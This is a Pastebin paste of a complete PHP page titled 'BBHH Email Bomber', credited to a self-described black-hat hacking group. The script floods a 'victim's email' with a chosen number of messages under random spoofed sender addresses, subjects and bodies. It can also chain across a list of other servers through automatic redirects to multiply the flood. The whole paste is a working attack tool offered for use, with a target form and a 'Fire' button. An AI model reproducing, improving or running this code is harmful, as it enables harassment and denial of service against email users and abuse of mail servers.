orionshunter

mail

Aug 13th, 2015
1,232
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
PHP 7.19 KB | None | 0 0
  1. <html>
  2.  
  3. <title>BBHH Email Bomber</title>
  4. <meta name="author" content="orionshunter">
  5. <meta name="description" content="BBHH Email Bomber v.1">
  6. <meta name="keywords" content="send mass mail, email bomb">
  7. <meta name="web_content_type" content="ZON3-404">
  8. <link rel="SHORTCUT ICON" href="http://i.imgur.com/MTTZR.gif">
  9. <style type="text/css">
  10. body
  11. {
  12. background-color:black;
  13. color:white;
  14. }
  15. #error
  16. {
  17. font-weight:bold;
  18. color:red;
  19. }
  20. #success
  21. {
  22. font-weight:bold;
  23. color:green;
  24. }
  25. a:link
  26. {
  27.     text-decoration:none;
  28.     color:#FFFF00;    
  29. }
  30. a:visited
  31. {
  32.     text-decoration:none;
  33.     color:white;
  34. }
  35. a:hover
  36. {
  37.     text-decoration:none;
  38.     color:red;
  39. }
  40. .style1 {
  41.     color: #00FF00;
  42.     font-family: Verdana, Arial, Helvetica, sans-serif;
  43. }
  44. .style2 {
  45.     color: #FF0000;
  46.     font-size: 18px;
  47. }
  48. .style3 {color: #FFFF00}
  49. .style4 {color: #FF0000}
  50. body{padding:0;margin:0;background-repeat:repeat;background-position:tile;background-color:black;color:#000000;font:normal 100% Courier;margin-top:0px;margin-left:0px;padding:0;margin-right:0px;background-image:url(http://i1100.photobucket.com/albums/g419/ghostleader121/c.gif);}
  51. img{border:1px solid grey;
  52. border-radius:30px;
  53. margin:auto;
  54. -webkit-transition:all .9s ease-in-out;
  55. -moz-transition:all .9s ease-in-out;
  56. }
  57. img:hover{-webkit-transform:rotate(360deg);
  58. -moz-transform:rotate(360deg);
  59. width:800px;
  60. }
  61. .style5 {color: #FFFFFF}
  62. .style7 {
  63.     font-family: Verdana, Arial, Helvetica, sans-serif;
  64.     font-weight: bold;
  65. }
  66. .style10 {
  67.     color: #00FFFF;
  68.     font-family: Verdana, Arial, Helvetica, sans-serif;
  69. }
  70. .style11 {font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; }
  71. .style12 {color: #00FF00; font-family: Verdana, Arial, Helvetica, sans-serif; font-weight: bold; }
  72. </style>
  73. <body bgcolor=black>
  74. <?php
  75. $rand_alpha = array_merge(range('A', 'Z'), range('a', 'z'));
  76. function checklink($url)
  77. {
  78.     $curl = curl_init($url);
  79.     curl_setopt($curl, CURLOPT_NOBODY, true);
  80.     $result = curl_exec($curl);
  81.     $ret = false;
  82.     if ($result !== false)
  83.     {
  84.         $statusCode = curl_getinfo($curl, CURLINFO_HTTP_CODE);  
  85.         if ($statusCode == 200)
  86.         {
  87.             $ret = true;  
  88.         }
  89.     }
  90.     curl_close($curl);
  91.     return $ret;
  92. }
  93. function getrand($arg1,$arg2="")
  94. {
  95.     global $rand_alpha;
  96.     $str = "";
  97.     for($i=0;$i<$arg1;$i++)
  98.     {
  99.         $str.= $rand_alpha[array_rand($rand_alpha,1)];
  100.     }
  101.     if($arg2 != "")
  102.     {
  103.         $str2 = "";
  104.         $email_len = rand(3,12);
  105.         for($i=0;$i<$email_len;$i++)        
  106.         {
  107.             $str2 .= $rand_alpha[array_rand($rand_alpha,1)];
  108.         }
  109.         $str .= '@'.$str2.'.com';
  110.     }
  111.     return $str;    
  112.    
  113. }
  114. ?>
  115. <center>
  116. <h1 class="style12">BBHH Email  Bomber V.1 </h1>
  117. <p><strong><sub id="info"><span class="style7"><a href="http://greenweb.com.bd" target="_blank"><span class="style2">Recoded by <span class="style3">orionshunter</span> of BD BLACK HAT HACKERS</span> <br />
  118.   Website: http://greenweb.com.bd</a></span></sub></strong></p>
  119. <p><span class="style12">My facebook:</span> <span class="style11"><a href="https://fb.com/orionshunter">fb.com/orionshunter</a></span> <br />
  120.   <?php
  121. if (!function_exists( 'mail' ) )
  122. {
  123.     $flag = 0;
  124.         $err[$init++] = 'mail() function is disbled on this server.';
  125. }
  126. if(isset($_GET['orions']))
  127. {
  128.     $flag = 0;
  129.     $email = $_GET['email'];
  130.     $file = $_GET['file'];
  131.     $no = (int)$_GET['no'];
  132.     $sub = $_GET['sub'];
  133.     $con = $_GET['content'];
  134.     $init = 0;
  135.     $point = 0;
  136.     if(isset($_GET['point']))
  137.     {
  138.         $point = $_GET['point'];
  139.     }
  140.    
  141.     if (!filter_var($email, FILTER_VALIDATE_EMAIL))
  142.     {
  143.            $err[$init++] = 'Please enter a valid Email Address';
  144.            $flag = 1;
  145.          }
  146.        if(!is_int($no))
  147.        {
  148.            $err[$init++] = 'Number of emails to be sent should an integer';
  149.            $flag = 1;
  150.        }
  151.        else
  152.        {
  153.            if($no < 0)
  154.            {
  155.                   $err[$init++] = 'Number of emails to be sent should be atleast 1';
  156.                $flag = 1;    
  157.            }
  158.            if($no == 0)
  159.            {
  160.                $no = rand(0,20);
  161.            }
  162.        }
  163.  
  164.     $err_count = count($err);
  165.     if($err_count > 0)
  166.     {
  167.         echo '<p id="error">';
  168.         for($shout=0;$shout<$err_count;$shout++)
  169.         {
  170.             echo $err[$shout].'<br />';
  171.         }
  172.         echo '</p>';
  173.     }
  174.     if($flag == 0)
  175.     {
  176.         echo '<p id="success">';
  177.         for($send=0;$send<$no;$send++)
  178.         {
  179.  
  180.         $up = rand(5,15);
  181.         $down = rand(5,15);
  182.         $sender = 'From: '. getrand($up,$down);
  183.     if($sub == "" || $sub == NULL)
  184.     {
  185.         $rand = rand(5,30);
  186.         $sub = getrand($rand);
  187.     }
  188.     if($con == "" || $con == NULL)
  189.     {
  190.         $rand = rand(30,300);
  191.         $con = getrand($rand);
  192.     }
  193.              mail($email,$sub,$con,$sender);
  194.         }
  195.         echo 'Mail Sent '.$no.' times';
  196.         echo '</p>';
  197.         if($file != "")
  198.            {
  199.                if(file_exists($file))
  200.                {
  201.                     $activate = 0;
  202.                     $done = 0;
  203.                   $fp = fopen($file,"r");
  204.                   while (($line = fgets($fp, 4096)) !== false)
  205.                   {
  206.                       if(checklink($line))
  207.                       {
  208.                                 if($point == $activate)
  209.                                 {
  210.                                     $goto = $line;
  211.                                     break;
  212.                                 }
  213.                                 else
  214.                                 {
  215.                                     $activate++;
  216.                                 }
  217.                             }
  218.                            
  219.                   }
  220.                 $point++;
  221.                   $goto .= '?email='.$email.'&file='.$file.'&no='.$no.'&sub='.$sub.'&content='.$con.'&orions=BOMB&point='.$point;
  222.                   echo ' <META HTTP-EQUIV="refresh" CONTENT="5;URL='.$goto.'">';    
  223.                   fclose($fp);
  224.                }
  225.  
  226.            }
  227.        }
  228.        
  229. }
  230.  
  231. ?>
  232. </p>
  233. <form method="get" action="">
  234. <br /><table>
  235. <tr>
  236.   <td><span class="style10">Target Email Address :</span></td>
  237.   <td><input type="text" name="email" value="victim's email" ></td></tr><tr><Td colspan=2>&nbsp;</td>
  238. </tr>
  239. <tr>
  240.   <td><span class="style1">Multi Server ( optional ) :</span></td>
  241.  
  242.   <td><input type="text" Value="more server more fun" name="file"></td></tr>
  243. <tr><Td colspan=2>&nbsp;</td>
  244. </tr>
  245. <tr>
  246.   <td><span class="style10">Number of emails per server:</span></td>
  247. <td><input type="text" value="number of email" name="no"></td></tr>
  248. <tr>
  249.   <td colspan=2>&nbsp;</td>
  250. </tr>
  251. <tr>
  252.   <td><span class="style10">message</span><span class="style10">:</span></td>
  253. <td><textarea name="content"></textarea></td></tr>
  254. </table>
  255. <p>
  256.   <input type="Submit" name="orions" value="Fire">
  257. </p>
  258. <p>&nbsp;</p>
  259. <p class="style11"><span class="style5">Thankyou for using my script.Soon, I will add more features. So follow my</span> <a href="http://greenweb.com.bd" target="_blank" class="style4">website</a><span class="style5"> regularly and give me your feedback </span></p>
  260. </form>
  261. </center>
  262. </body>
  263. </html>
Advertisement
Add Comment
Please, Sign In to add comment